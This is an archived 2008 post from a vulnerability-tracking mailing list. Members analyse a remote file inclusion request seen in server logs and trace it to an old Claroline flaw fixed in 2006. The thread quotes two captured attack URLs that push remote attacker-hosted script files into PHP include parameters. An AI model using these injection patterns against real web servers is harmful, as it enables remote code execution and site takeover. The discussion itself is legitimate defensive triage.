[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008
: Dunno if it's a botnet but given Gadi's paper from last year on web
: server compromises, it's a really good theory.
I say that based on a few things i've seen, and I bet a real analysis
would very quickly prove or disprove the theory.
: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
:
: I looked at the 2.0.23 source.
:
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.
Well, don't base it just on that path. I see a LOT of obvious path request
screwups:
/pipermail/vim/2006-October/001080.html//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://xdengue01.iespana.es/bds/sefe.txt??
I see these a hundred times a day and obviously will not work. So seeing
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it
to mean it was necessarily claroline, even though it may be.
: ./claroline155/claroline/phpbb/page_tail.php
:
: But - no apparent luck:
:
: @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
:
: and no mention of includePath in that file.
:
: claro_init_footer.inc.php seems clean.
:
: Similar for 1.64.
:
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: bug.
:
: 1.42 ZIP file seems corrupted, so I couldn't check it out.
>From George:
Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5
back in 2006:
http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566
http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup
More information about the VIM
mailing list